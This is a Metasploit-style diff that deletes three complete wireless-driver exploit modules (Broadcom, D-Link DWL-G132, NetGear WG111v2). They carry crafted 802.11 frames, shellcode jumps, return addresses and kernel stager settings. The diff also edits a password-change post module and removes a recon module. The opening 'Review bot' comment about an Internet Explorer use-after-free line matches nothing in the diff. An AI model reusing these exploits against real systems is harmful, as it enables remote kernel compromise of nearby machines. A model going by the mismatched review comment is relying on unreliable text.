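Review bot: The rewritten description still reads awkwardly because its unchanged first line keeps `This module exploits an use after free condition on Internet Explorer as used in the wild`; since this commit is already rewording the paragraph, fix that line too, to `This module exploits a use-after-free condition in Internet Explorer, as used in the wild`. The two added lines themselves read fine, but the sentence now spans three lines and the grammatical slip sits on the one left untouched. The enclosing `initialize` / `update_info` hash starts and ends outside this hunk.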
@@ -1,199 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the Broadcom Wireless driver - that allows remote code execution in kernel mode by sending a 802.11 probe - response that contains a long SSID. The target MAC address must - be provided to use this exploit. The two cards tested fell into the - 00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges. - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. 
- }, - 'Author' => - [ - 'Chris Eagle', # initial discovery - 'Johnny Cache ', # the man with the plan - 'skape', # windows kernel ninjitsu and debugging - 'hdm' # porting the C version to ruby - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-5882'], - ['OSVDB', '30294'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 500 - }, - 'Platform' => 'win', - 'Targets' => - [ - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - - } - } - } - ], - - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 11 2006' - )) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - - print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...") - - while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) - - select(nil, nil, nil, 0.02) - wifi.write(create_response) - - select(nil, nil, nil, 0.01) - wifi.write(create_beacon) - - break if session_created? 
- - end - - print_status("Finished sending frames...") - end - - def create_beacon - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton('FF:FF:FF:FF:FF:FF') - seq = [Time.now.to_i % 4096].pack('n') - - blob = create_frame - blob[0,1] = 0x80.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src - blob[22,2] = seq - - blob - end - - def create_response - src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93 - dst = eton(datastore['ADDR_DST']) - seq = [Time.now.to_i % 256].pack('n') - - blob = create_frame - blob[0,1] = 0x50.chr - blob[4,6] = dst - blob[10,6] = src - blob[16,6] = src # bssid field, good idea to set to src. - blob[22,2] = seq - - blob - end - - def create_frame - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - "\x58\x58\x58\x58\x58\x58" + # src - "\x58\x58\x58\x58\x58\x58" + # bssid - "\x70\xed" + # sequence number - - # - # fixed parameters - # - - # timestamp value - rand_text_alphanumeric(8) + - "\x64\x00" + # beacon interval - "\x11\x04" + # capability flags - - # - # tagged parameters - # - - # ssid tag - "\x00" + # tag: SSID parameter set - "\x5d" + # len: length is 93 bytes - - # jump into the payload - "\x89\xf9" + # mov edi, ecx - "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b - "\xff\xe1" + # jmp ecx - - # padding - rand_text_alphanumeric(79) + - - # return address - [target.ret].pack('V') + - - # vendor specific tag - "\xdd" + # wpa - "\xff" + # big as we can make it - - # the kernel-mode stager - payload.encoded - end - -end diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb deleted file mode 100644 index 5184b77bc4..0000000000 --- a/modules/exploits/windows/driver/dlink_wifi_rates.rb +++ /dev/null 
@@ -1,195 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = LowRanking
-
- include Msf::Exploit::Lorcon2
- include Msf::Exploit::KernelMode
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
- 'Description' => %q{
- This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
- with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
- allows remote code execution in kernel mode. The stack buffer overflow is triggered
- when a 802.11 Beacon frame is received that contains a long Rates information
- element. This exploit was tested with version 1.0.1.41 of the
- A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
- versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
- adapter and appear to resolve this flaw, but D-Link does not offer an updated
- driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
- all cards within range of the attack will be affected. The tested adapter used
- a MAC address in the range of 00:11:95:f2:XX:XX.
-
- Vulnerable clients will need to have their card in a non-associated state
- for this exploit to work. The easiest way to reproduce this bug is by starting
- the exploit and then accessing the Windows wireless network browser and
- forcing it to refresh.
-
- D-Link was NOT contacted about this flaw. A search of the SecurityFocus
- database indicates that D-Link has not provided an official patch or
- solution for any of the seven flaws listed at the time of writing:
- (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
-
- As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
- DWL-G132 driver (v1.21).
-
- This module depends on the Lorcon2 library and only works on the Linux platform
- with a supported wireless card. Please see the Ruby Lorcon2 documentation
- (external/ruby-lorcon/README) for more information.
- },
- 'Author' =>
- [
- 'hdm', # discovery, exploit dev
- 'skape', # windows kernel ninjitsu
- 'Johnny Cache ' # making all of this possible
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2006-6055'],
- ['OSVDB', '30296'],
- ['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
- ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
- ],
- 'Privileged' => true,
-
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'thread',
- },
-
- 'Payload' =>
- {
- # Its a beautiful day in the neighborhood...
- 'Space' => 1000
- },
- 'Platform' => 'win',
- 'Targets' =>
- [
- # Windows XP SP2 with the latest updates
- # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
- [ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
- {
- 'Ret' => 0x8066662c, # jmp edi
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'ExtendedOptions' =>
- {
- 'Stager' => 'sud_syscall_hook',
- 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
- 'Recovery' => 'idlethread_restart',
- 'KiIdleLoopAddress' => 0x804dbb27,
- }
- }
- }
- ],
-
- # Windows XP SP2 install media, no patches
- # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
- [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
- {
- 'Ret' => 0x804f16eb, # jmp edi
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'ExtendedOptions' =>
- {
- 'Stager' => 'sud_syscall_hook',
- 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
- 'Recovery' => 'idlethread_restart',
- 'KiIdleLoopAddress' => 0x804dc0c7,
- }
- }
- }
- ]
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Nov 13 2006'))
-
- register_options(
- [
- OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
- OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
- ], self.class)
- end
-
- def exploit
- open_wifi
-
- stime = Time.now.to_i
- rtime = datastore['RUNTIME'].to_i
- count = 0
-
- print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
- while (stime + rtime > Time.now.to_i)
- wifi.write(create_beacon)
- select(nil, nil, nil, 0.10) if (count % 100 == 0)
-
- count += 1
-
- # Exit if we get a session
- break if session_created?
- end
-
- print_status("Completed sending beacons.")
- end
-
-
-#
-# The following research was provided by Gil Dabah of ZERT
-#
-# The long rates field bug can be triggered three different ways (at least):
-# 1) Send a single rates IE with valid rates up front and long data
-# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
-# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
-#
-
- def create_beacon
-
- ssid = rand_text_alphanumeric(6)
- bssid = ("\x00" * 2) + rand_text(4)
- src = ("\x90" * 4) + "\xeb\x2b"
- seq = [rand(255)].pack('n')
-
- buff = rand_text(75)
- buff[0, 2] = "\xeb\x49"
- buff[71, 4] = [target.ret].pack('V')
-
- frame =
- "\x80" + # type/subtype
- "\x00" + # flags
- "\x00\x00" + # duration
- eton(datastore['ADDR_DST']) + # dst
- src + # src
- bssid + # bssid
- seq + # seq
- rand_text(8) + # timestamp value
- "\x64\x00" + # beacon interval
- "\x00\x05" + # capability flags
-
- # ssid tag
- "\x00" + ssid.length.chr + ssid +
-
- # supported rates
- "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
-
- # current channel
- "\x03" + "\x01" + channel.chr +
-
- # eip was his name-o
- "\x01" + buff.length.chr + buff +
-
- payload.encoded
-
- return frame
- end
-
-end
diff --git a/modules/exploits/windows/driver/netgear_wg111_beacon.rb b/modules/exploits/windows/driver/netgear_wg111_beacon.rb
deleted file mode 100644
index 05b705e909..0000000000
--- a/modules/exploits/windows/driver/netgear_wg111_beacon.rb
+++ /dev/null
@@ -1,208 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = LowRanking
-
- include Msf::Exploit::Lorcon2
- include Msf::Exploit::KernelMode
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'NetGear WG111v2 Wireless Driver Long Beacon Overflow',
- 'Description' => %q{
- This module exploits a stack buffer overflow in the NetGear WG111v2 wireless
- device driver. This stack buffer overflow allows remote code execution in kernel mode.
- The stack buffer overflow is triggered when a 802.11 Beacon frame is received that
- contains more than 1100 bytes worth of information elements.
-
- This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and
- a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames,
- all cards within range of the attack will be affected. The tested adapter used
- a MAC address in the range of 00:18:4d:02:XX:XX.
-
- Vulnerable clients will need to have their card in a non-associated state
- for this exploit to work. The easiest way to reproduce this bug is by starting
- the exploit and then unplugging and reinserting the USB card. The exploit can
- take up to a minute to execute the payload, depending on system activity.
-
- NetGear was NOT contacted about this flaw. A search of the SecurityFocus
- database indicates that NetGear has not provided an official patch or
- solution for any of the thirty flaws listed at the time of writing. This list
- includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270,
- 7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837,
- 16835, 19468, and 19973.
-
- This module depends on the Lorcon2 library and only works on the Linux platform
- with a supported wireless card. Please see the Ruby Lorcon2 documentation
- (external/ruby-lorcon/README) for more information.
- },
- 'Author' => [ 'hdm' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2006-5972'],
- ['OSVDB', '30473'],
- ['URL', 'http://projects.info-pull.com/mokb/MOKB-16-11-2006.html'],
- ],
- 'Privileged' => true,
-
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'thread',
- },
- 'Payload' =>
- {
- # Its a beautiful day in the neighborhood...
- 'Space' => 1000,
- },
- 'Platform' => 'win',
- 'Targets' =>
- [
- # Windows XP SP2 with the latest updates
- # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
- [ 'Windows XP SP2 (5.1.2600.2122), WG111v2.SYS 5.1213.6.316',
- {
- 'Ret' => 0x80502d7f, # jmp esp
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'ExtendedOptions' =>
- {
- 'Stager' => 'sud_syscall_hook',
- 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
- 'Recovery' => 'idlethread_restart',
- 'KiIdleLoopAddress' => 0x804dbb27,
- }
- }
- }
- ],
-
- # Windows XP SP2 install media, no patches
- # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
- [ 'Windows XP SP2 (5.1.2600.2180), WG111v2.SYS 5.1213.6.316',
- {
- 'Ret' => 0x804ed5cb, # jmp esp
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'ExtendedOptions' =>
- {
- 'Stager' => 'sud_syscall_hook',
- 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
- 'Recovery' => 'idlethread_restart',
- 'KiIdleLoopAddress' => 0x804dc0c7,
- }
- }
- }
- ]
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Nov 16 2006'))
-
- register_options(
- [
- OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
- OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
- ], self.class)
- end
-
- def exploit
- open_wifi
-
- stime = Time.now.to_i
- rtime = datastore['RUNTIME'].to_i
- count = 0
-
- print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
- while (stime + rtime > Time.now.to_i)
- wifi.write(create_beacon)
- select(nil, nil, nil, 0.10) if (count % 100 == 0)
-
- count += 1
-
- # Exit if we get a session
- break if session_created?
- end
-
- print_status("Completed sending beacons.")
- end
-
- # Convert arbitrary data into a series of information elements
- def ie_padding(data)
- ret = 0
- idx = 0
- len = 0
-
- while(idx < data.length)
- len = data[idx+1]
- if (! len)
- data << "\x00"
- len = 0
- end
-
- idx += len + 2
- end
-
- data << yield(idx - data.length)
- end
-
- def create_beacon
-
- ssid = rand_text_alphanumeric(16)
- bssid = ("\x00" * 2) + rand_text(4)
- src = ("\x00" * 2) + rand_text(4)
- seq = [rand(255)].pack('n')
- stamp = rand_text(8)
-
- frame =
- "\x80" + # type/subtype
- "\x00" + # flags
- "\x00\x00" + # duration
- eton(datastore['ADDR_DST']) + # dst
- src + # src
- bssid + # bssid
- seq + # seq
- stamp + # timestamp value
- "\x64\x00" + # beacon interval
- rand_text(2) + # capability flags
-
- # ssid tag
- "\x00" + ssid.length.chr + ssid +
-
- # supported rates
- "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
-
- # current channel
- "\x03" + "\x01" + channel.chr
-
- # Bounce through EDI to the uncorrupted payload
- jumper =
- "\x6a\x39" + # push byte +0x39
- "\x58" + # pop eax
- "\x01\xc7" + # add edi, eax
- "\xff\xe7" # jmp edi
-
- # Overwrite enough to pop the return
- buf = rand_text(1160)
-
- # Kernel-mode stager fun goes here
- buf[0, payload.encoded.length] = payload.encoded
-
- # Return address is a jmp ESP
- buf[1101, 4] = [ target.ret ].pack('V')
-
- # Jump back to EDI + 0x39
- buf[1113, jumper.length] = jumper
-
- # Pad it out to be a valid set of IEs
- frame << ie_padding(buf) {|c| rand_text(c) }
-
- return frame
- end
-
-end
diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb
index 6099b90013..80d085053e 100644
--- a/modules/post/windows/manage/change_password.rb
+++ b/modules/post/windows/manage/change_password.rb
@@ -11,10 +11,11 @@ class Metasploit3 < Msf::Post
 super(update_info(info,
 'Name' => "Windows Manage Change Password",
 'Description' => %q{
- This module will attempt to change the password of the targetted account.
- Its main purpose is when you have valid credentials on a remote host but
- they require a password change before you can login e.g.
- 'System error 1907 has occurred.'
+ This module will attempt to change the password of the targeted account.
+ The typical usage is to change a newly created account's password on a
+ remote host to avoid the error, 'System error 1907 has occurred,' which
+ is caused when the account policy enforces a password change before the
+ next login.
 },
 'License' => MSF_LICENSE,
 'Platform' => ['win'],
@@ -33,7 +34,7 @@ class Metasploit3 < Msf::Post
 def run
 unless client.railgun
- print_error('This module requires a native windows payload that supports railgun.')
+ print_error('This module requires a native Windows payload that supports Railgun.')
 return
 end
diff --git a/modules/post/windows/recon/resolve_hostname.rb b/modules/post/windows/recon/resolve_hostname.rb
deleted file mode 100644
index 37befc65e2..0000000000
--- a/modules/post/windows/recon/resolve_hostname.rb
+++ /dev/null
@@ -1,79 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'rex'
-
-class Metasploit3 < Msf::Post
- require 'msf/core/module/deprecated'
- include Msf::Module::Deprecated
- deprecated Date.new(2014, 03, 24), 'post/multi/gather/resolve_hosts'
-
- def initialize(info={})
- super( update_info( info,
- 'Name' => 'Windows Recon Resolve Hostname',
- 'Description' => %q{
- This module resolves a hostname to IP address via the victim,
- similar to the Unix 'dig' command. Since resolution happens over
- an established session from the perspective of the remote host,
- this module can be used to determine differences between external
- and internal resolution, especially for potentially high-value
- internal addresses of devices named 'mail' or 'www.'
- },
- 'License' => MSF_LICENSE,
- 'Author' => [ 'mubix' ],
- 'Platform' => [ 'win' ],
- 'SessionTypes' => [ 'meterpreter' ]
- ))
-
- register_options(
- [
- OptString.new('HOSTNAME', [false, 'Hostname to lookup', nil]),
- OptPath.new('HOSTFILE', [false, 'Line separated file with hostnames to resolve', nil]),
- OptBool.new('SAVEHOSTS', [true, 'Save resolved hosts to the database', true])
- ], self.class)
- end
-
- def resolve_hostname(hostname)
- begin
- vprint_status("Looking up IP for #{hostname}")
- result = client.net.resolve.resolve_host(hostname)
- if result[:ip].nil? or result[:ip].blank?
- print_error("Failed to resolve #{hostname}")
- return
- else
- hostip = result[:ip]
- end
-
-
- print_status("#{hostname} resolves to #{hostip}")
-
- if datastore['SAVEHOSTS']
- report_host({
- :host => hostip,
- :name => hostname
- })
- end
-
- rescue Rex::Post::Meterpreter::RequestError
- print_status('Windows 2000 and prior does not support getaddrinfo')
- end
-
- end
-
- def run
- if datastore['HOSTNAME']
- resolve_hostname(datastore['HOSTNAME'])
- end
-
- if datastore['HOSTFILE']
- ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
- if hostname.strip != ""
- resolve_hostname(hostname.strip)
- end
- end
- end
- end
-end